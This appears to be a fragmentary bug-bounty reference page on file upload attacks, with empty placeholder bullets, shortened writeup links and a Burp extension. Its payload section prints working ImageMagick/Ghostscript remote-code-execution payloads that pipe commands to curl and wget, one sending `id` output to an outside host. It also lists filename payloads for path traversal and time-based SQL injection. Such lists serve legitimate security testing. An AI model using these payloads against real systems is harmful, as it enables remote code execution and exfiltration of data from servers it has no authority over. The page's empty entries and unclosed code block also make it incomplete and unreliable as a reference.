# File Upload
**Blogs / Articles:**
*
*
*
*
*
*
*
*
**Writeups:**
* [https://link.medium.com/sILCWr8xB3](https://t.co/nHvvd7QwpJ?amp=1)
* [https://link.medium.com/V8SdaJ8xB3](https://t.co/4YlKwoqEaN?amp=1)
* [https://link.medium.com/fRfag0byB3](https://t.co/PCDbm9j1jo?amp=1)
* [https://link.medium.com/6qTQZwayB3](https://t.co/qIZXqoygYJ?amp=1)
* [https://link.medium.com/jFGhtvbyB3](https://t.co/2WciQWCzxc?amp=1)
**Tools:**
* Burp Suite Extension - [Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa)
*
*
**Cheatsheets:**
**Payloads:**
* [**https://github.com/daffainfo/AllAboutBugBounty/blob/master/BypassFileUpload.md**](https://github.com/daffainfo/AllAboutBugBounty/blob/master/BypassFileUpload.md)
Imagemagick RCE:
```
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl${IFS}zero-way.net/cc`id`) currentdevice
putdeviceprops
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%wget http://https://helloworld.free.beeceptor.com) currentdevice
putdeviceprops
```
**Tweets:**
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
```
Chaining file uploads with other vulns:-
Set filename to:-
> ../../../tmp/lol.png for path traversals
> sleep(10)-- -.jpg for SQLi.
>